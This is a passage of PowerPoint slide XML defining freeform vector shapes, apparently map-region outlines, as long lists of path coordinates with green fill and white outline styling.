                      <a:pt x="197" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="40"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36134" name="Freeform 267"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2592" y="2172"/>
                <a:ext cx="197" cy="160"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 197"/>
                  <a:gd name="T1" fmla="*/ 33 h 160"/>
                  <a:gd name="T2" fmla="*/ 5 w 197"/>
                  <a:gd name="T3" fmla="*/ 20 h 160"/>
                  <a:gd name="T4" fmla="*/ 0 w 197"/>
                  <a:gd name="T5" fmla="*/ 15 h 160"/>
                  <a:gd name="T6" fmla="*/ 7 w 197"/>
                  <a:gd name="T7" fmla="*/ 9 h 160"/>
                  <a:gd name="T8" fmla="*/ 16 w 197"/>
                  <a:gd name="T9" fmla="*/ 6 h 160"/>
                  <a:gd name="T10" fmla="*/ 26 w 197"/>
                  <a:gd name="T11" fmla="*/ 0 h 160"/>
                  <a:gd name="T12" fmla="*/ 44 w 197"/>
                  <a:gd name="T13" fmla="*/ 4 h 160"/>
                  <a:gd name="T14" fmla="*/ 55 w 197"/>
                  <a:gd name="T15" fmla="*/ 0 h 160"/>
                  <a:gd name="T16" fmla="*/ 71 w 197"/>
                  <a:gd name="T17" fmla="*/ 6 h 160"/>
                  <a:gd name="T18" fmla="*/ 93 w 197"/>
                  <a:gd name="T19" fmla="*/ 8 h 160"/>
                  <a:gd name="T20" fmla="*/ 103 w 197"/>
                  <a:gd name="T21" fmla="*/ 4 h 160"/>
                  <a:gd name="T22" fmla="*/ 117 w 197"/>
                  <a:gd name="T23" fmla="*/ 9 h 160"/>
                  <a:gd name="T24" fmla="*/ 124 w 197"/>
                  <a:gd name="T25" fmla="*/ 12 h 160"/>
                  <a:gd name="T26" fmla="*/ 124 w 197"/>
                  <a:gd name="T27" fmla="*/ 16 h 160"/>
                  <a:gd name="T28" fmla="*/ 134 w 197"/>
                  <a:gd name="T29" fmla="*/ 18 h 160"/>
                  <a:gd name="T30" fmla="*/ 139 w 197"/>
                  <a:gd name="T31" fmla="*/ 21 h 160"/>
                  <a:gd name="T32" fmla="*/ 144 w 197"/>
                  <a:gd name="T33" fmla="*/ 22 h 160"/>
                  <a:gd name="T34" fmla="*/ 150 w 197"/>
                  <a:gd name="T35" fmla="*/ 24 h 160"/>
                  <a:gd name="T36" fmla="*/ 156 w 197"/>
                  <a:gd name="T37" fmla="*/ 21 h 160"/>
                  <a:gd name="T38" fmla="*/ 169 w 197"/>
                  <a:gd name="T39" fmla="*/ 26 h 160"/>
                  <a:gd name="T40" fmla="*/ 173 w 197"/>
                  <a:gd name="T41" fmla="*/ 29 h 160"/>
                  <a:gd name="T42" fmla="*/ 177 w 197"/>
                  <a:gd name="T43" fmla="*/ 31 h 160"/>
                  <a:gd name="T44" fmla="*/ 185 w 197"/>
                  <a:gd name="T45" fmla="*/ 31 h 160"/>
                  <a:gd name="T46" fmla="*/ 194 w 197"/>
                  <a:gd name="T47" fmla="*/ 29 h 160"/>
                  <a:gd name="T48" fmla="*/ 196 w 197"/>
                  <a:gd name="T49" fmla="*/ 35 h 160"/>
                  <a:gd name="T50" fmla="*/ 189 w 197"/>
                  <a:gd name="T51" fmla="*/ 45 h 160"/>
                  <a:gd name="T52" fmla="*/ 173 w 197"/>
                  <a:gd name="T53" fmla="*/ 54 h 160"/>
                  <a:gd name="T54" fmla="*/ 159 w 197"/>
                  <a:gd name="T55" fmla="*/ 61 h 160"/>
                  <a:gd name="T56" fmla="*/ 160 w 197"/>
                  <a:gd name="T57" fmla="*/ 66 h 160"/>
                  <a:gd name="T58" fmla="*/ 144 w 197"/>
                  <a:gd name="T59" fmla="*/ 82 h 160"/>
                  <a:gd name="T60" fmla="*/ 141 w 197"/>
                  <a:gd name="T61" fmla="*/ 91 h 160"/>
                  <a:gd name="T62" fmla="*/ 144 w 197"/>
                  <a:gd name="T63" fmla="*/ 101 h 160"/>
                  <a:gd name="T64" fmla="*/ 145 w 197"/>
                  <a:gd name="T65" fmla="*/ 108 h 160"/>
                  <a:gd name="T66" fmla="*/ 138 w 197"/>
                  <a:gd name="T67" fmla="*/ 116 h 160"/>
                  <a:gd name="T68" fmla="*/ 134 w 197"/>
                  <a:gd name="T69" fmla="*/ 128 h 160"/>
                  <a:gd name="T70" fmla="*/ 121 w 197"/>
                  <a:gd name="T71" fmla="*/ 131 h 160"/>
                  <a:gd name="T72" fmla="*/ 111 w 197"/>
                  <a:gd name="T73" fmla="*/ 145 h 160"/>
                  <a:gd name="T74" fmla="*/ 103 w 197"/>
                  <a:gd name="T75" fmla="*/ 146 h 160"/>
                  <a:gd name="T76" fmla="*/ 76 w 197"/>
                  <a:gd name="T77" fmla="*/ 146 h 160"/>
                  <a:gd name="T78" fmla="*/ 62 w 197"/>
                  <a:gd name="T79" fmla="*/ 155 h 160"/>
                  <a:gd name="T80" fmla="*/ 60 w 197"/>
                  <a:gd name="T81" fmla="*/ 156 h 160"/>
                  <a:gd name="T82" fmla="*/ 57 w 197"/>
                  <a:gd name="T83" fmla="*/ 160 h 160"/>
                  <a:gd name="T84" fmla="*/ 47 w 197"/>
                  <a:gd name="T85" fmla="*/ 151 h 160"/>
                  <a:gd name="T86" fmla="*/ 44 w 197"/>
                  <a:gd name="T87" fmla="*/ 146 h 160"/>
                  <a:gd name="T88" fmla="*/ 37 w 197"/>
                  <a:gd name="T89" fmla="*/ 137 h 160"/>
                  <a:gd name="T90" fmla="*/ 28 w 197"/>
                  <a:gd name="T91" fmla="*/ 136 h 160"/>
                  <a:gd name="T92" fmla="*/ 32 w 197"/>
                  <a:gd name="T93" fmla="*/ 124 h 160"/>
                  <a:gd name="T94" fmla="*/ 30 w 197"/>
                  <a:gd name="T95" fmla="*/ 114 h 160"/>
                  <a:gd name="T96" fmla="*/ 37 w 197"/>
                  <a:gd name="T97" fmla="*/ 101 h 160"/>
                  <a:gd name="T98" fmla="*/ 29 w 197"/>
                  <a:gd name="T99" fmla="*/ 89 h 160"/>
                  <a:gd name="T100" fmla="*/ 38 w 197"/>
                  <a:gd name="T101" fmla="*/ 85 h 160"/>
                  <a:gd name="T102" fmla="*/ 39 w 197"/>
                  <a:gd name="T103" fmla="*/ 66 h 160"/>
                  <a:gd name="T104" fmla="*/ 39 w 197"/>
                  <a:gd name="T105" fmla="*/ 57 h 160"/>
                  <a:gd name="T106" fmla="*/ 50 w 197"/>
                  <a:gd name="T107" fmla="*/ 47 h 160"/>
                  <a:gd name="T108" fmla="*/ 41 w 197"/>
                  <a:gd name="T109" fmla="*/ 38 h 160"/>
                  <a:gd name="T110" fmla="*/ 21 w 197"/>
                  <a:gd name="T111" fmla="*/ 40 h 160"/>
                  <a:gd name="T112" fmla="*/ 7 w 197"/>
                  <a:gd name="T113" fmla="*/ 40 h 160"/>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97"/>
                  <a:gd name="T172" fmla="*/ 0 h 160"/>
                  <a:gd name="T173" fmla="*/ 197 w 197"/>
                  <a:gd name="T174" fmla="*/ 160 h 160"/>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97" h="160">
                    <a:moveTo>
                      <a:pt x="7" y="40"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="40"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36135" name="Freeform 268"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2663" y="1999"/>
                <a:ext cx="226" cy="224"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 226 w 226"/>
                  <a:gd name="T1" fmla="*/ 198 h 224"/>
                  <a:gd name="T2" fmla="*/ 221 w 226"/>
                  <a:gd name="T3" fmla="*/ 224 h 224"/>
                  <a:gd name="T4" fmla="*/ 216 w 226"/>
                  <a:gd name="T5" fmla="*/ 218 h 224"/>
                  <a:gd name="T6" fmla="*/ 212 w 226"/>
                  <a:gd name="T7" fmla="*/ 213 h 224"/>
                  <a:gd name="T8" fmla="*/ 211 w 226"/>
